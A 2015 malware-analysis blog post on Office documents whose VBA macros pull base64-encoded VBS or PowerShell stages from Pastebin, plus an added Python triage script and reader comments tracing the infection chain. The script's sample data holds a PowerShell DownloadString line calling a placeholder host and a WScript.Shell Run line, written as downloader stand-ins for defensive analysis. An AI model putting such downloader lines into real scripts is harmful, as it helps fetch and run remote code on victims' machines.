Didier Stevens

Wednesday 8 April 2015

Quickpost: Maldocs: VBA And Pastebin

Filed under: Malware — Didier Stevens @ 20:24

For a day or two now I've been seeing yet another trick used by malware authors in their VBA macros.

The sample I’m looking at is 26B857A0A57B89166584CBB7167CAA19.

The VBA macro downloads base64-encoded scripts from Pastebin:

[Screenshot: 20150408-220943]

[Screenshot: 20150408-221046]

The scripts are delimited by HTML-like tags such as <text10>. Tags starting with stext wrap scripts for Windows XP systems, and tags starting with text wrap scripts for Windows Vista and later. The split exists because of PowerShell: on XP, where PowerShell is not installed by default, the VBS scripts are executed; on more recent systems, the PowerShell scripts are executed.

The URL of the payload comes from another Pastebin entry:

[Screenshot: 20150408-221533]

Correct: that trojan is hosted on Dropbox.
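As an added example (not code from the post, and not the malware's own code), here is a small Python triage script that works the tag-delimited layout described above on a constructed sample paste: it pulls every stextN/textN block, strips Pastebin's line wrapping, base64-decodes the body, sorts the blocks by the XP versus Vista-and-later convention, checks whether the decoded text looks like VBScript or PowerShell, and lists any URLs in the decoded scripts (the pivot to the second Pastebin entry that holds the payload URL). The closing-tag form, the tag numbering, the two sample scripts and the URL in them are assumptions; the post only shows the opening tag <text10>.

```python
import base64
import re
import textwrap

# Tag layout assumed from the post: <textN>...</textN> for Vista and later
# (PowerShell), <stextN>...</stextN> for XP (VBScript). The closing-tag form
# is an assumption; the post only shows the opening tag "<text10>".
TAG_RE = re.compile(r"<(?P<name>s?text\d+)>(?P<body>.*?)</(?P=name)>", re.DOTALL)
URL_RE = re.compile(r"https?://[^\s\"'<>)]+")


def build_paste(scripts):
    """Build a stand-in for a Pastebin entry: each script base64-encoded,
    wrapped at 64 columns like a pasted blob, and enclosed in its tag.
    This is constructed sample data, not the real paste from the post."""
    parts = []
    for name, script in scripts.items():
        b64 = base64.b64encode(script.encode("utf-8")).decode("ascii")
        parts.append(f"<{name}>\n{textwrap.fill(b64, 64)}\n</{name}>")
    return "\n\n".join(parts)


def extract_tagged_blocks(paste):
    """Return {tag name: decoded script text} for every tagged block.
    A block whose body is not valid base64 maps to None instead of raising."""
    blocks = {}
    for m in TAG_RE.finditer(paste):
        raw = re.sub(r"\s+", "", m.group("body"))   # undo line wrapping
        raw += "=" * (-len(raw) % 4)                 # restore dropped padding
        try:
            data = base64.b64decode(raw, validate=True)
            blocks[m.group("name")] = data.decode("utf-8", "replace")
        except ValueError:                           # binascii.Error subclasses ValueError
            blocks[m.group("name")] = None
    return blocks


def platform_for(tag_name):
    """stext* blocks target Windows XP, text* blocks Vista and later."""
    return "xp" if tag_name.startswith("stext") else "vista+"


def scripts_for_platform(blocks, platform):
    return {n: s for n, s in blocks.items() if platform_for(n) == platform}


def guess_language(script):
    """Heuristic check that a decoded block matches the expected language:
    VBScript for XP blocks, PowerShell for newer ones."""
    ps = re.search(r"\$\w+\s*=|New-Object|Invoke-|-join|\[System\.", script)
    vbs = re.search(r"\bCreateObject\(|\bWScript\.|\bSet\s+\w+\s*=", script, re.IGNORECASE)
    if ps and not vbs:
        return "powershell"
    if vbs and not ps:
        return "vbscript"
    return "unknown"


def find_urls(script):
    """URLs embedded in a decoded script (e.g. the next Pastebin entry)."""
    return URL_RE.findall(script or "")


# Constructed sample scripts; the hostname is a placeholder, not a real site.
SAMPLE_SCRIPTS = {
    "stext1": 'Set sh = CreateObject("WScript.Shell")\r\n'
              'sh.Run "cmd /c echo xp-branch", 0, True\r\n',
    "text1": '$wc = New-Object System.Net.WebClient\r\n'
             '$u = $wc.DownloadString("http://paste.example.invalid/raw/abc123")\r\n',
}
SAMPLE_PASTE = build_paste(SAMPLE_SCRIPTS)

if __name__ == "__main__":
    for name, script in extract_tagged_blocks(SAMPLE_PASTE).items():
        print(f"{name}: platform={platform_for(name)} "
              f"language={guess_language(script)} urls={find_urls(script)}")
```

Point the script at a saved raw paste instead of SAMPLE_PASTE to triage a real sample; the language check is what flags a paste whose "XP" block unexpectedly carries PowerShell, or vice versa.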


Quickpost info


4 Comments »

  1. Saw that yesterday myself. Here is a report for such a sample: https://www.hybrid-analysis.com/sample/f42608e8d6c614a85c14f423a9acbd902d4d7b54b3c93decf48adea3f1bdf63c?environmentId=2

    Comment by Anonymous — Thursday 9 April 2015 @ 7:22

  2. .BAT==>>.VBS==>>.PS1

    Comment by Yogesh — Thursday 9 April 2015 @ 7:30

  3. To be precise, it is VBA -> BAT -> VBS -> PS1 -> EXE on Windows Vista and later.
    On Windows XP, it is VBA -> BAT -> (VBS; EXE)

    Comment by Didier Stevens — Thursday 9 April 2015 @ 13:20

  4. […] commercial products, on the other hand, are safe. The trick: the Office document (text, spreadsheet, presentation) contains only a tiny, inconspicuous downloader in the form of a VBA macro. It fetches the code needed for the infection from Pastebin, which in turn […]

    Pingback by Neue Gefahr durch MS-Office Trojaner | pc-flüsterer bremen — Saturday 11 April 2015 @ 18:26

